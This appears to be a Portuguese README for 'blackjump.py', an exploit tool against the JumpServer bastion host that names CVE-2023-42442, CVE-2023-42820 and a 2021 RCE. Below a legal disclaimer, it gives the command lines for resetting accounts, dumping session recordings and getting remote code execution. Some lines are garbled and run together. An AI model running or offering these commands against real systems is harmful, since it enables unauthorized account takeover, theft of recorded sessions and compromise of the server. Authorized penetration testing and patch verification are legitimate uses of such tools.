
Exploração abrangente de vulnerabilidades não autorizadas no JumpServer (bastião), Exploit for CVE-2023-42442 / CVE-2023-42820 / RCE 2021
Aviso de isenção: Esta ferramenta destina-se exclusivamente a atividades de segurança empresarial legalmente autorizadas. Ao usar esta ferramenta para testes, você deve garantir que a ação esteja em conformidade com as leis e regulamentos locais e que tenha obtido autorização suficiente. Não use contra alvos não autorizados.
Se você praticar qualquer ato ilegal ao usar esta ferramenta, você será o único responsável pelas consequências; não assumiremos qualquer responsabilidade legal ou solidária.
Exploração abrangente de vulnerabilidades do JumpServer Bastion Host
python3 -m pip install -r requirements.txt
--user--emailpython3 blackjump.py reset https://vulerability

<uuid4>.tar no diretório output/ pode ser arrastado para o reprodutor do JumpServer para reprodução.python3 blackjump.py dump https://vulerability
e
python3 blackjump.py rce http(s)://vulerability

python3 blackjump.py {reset,dump,rce} -h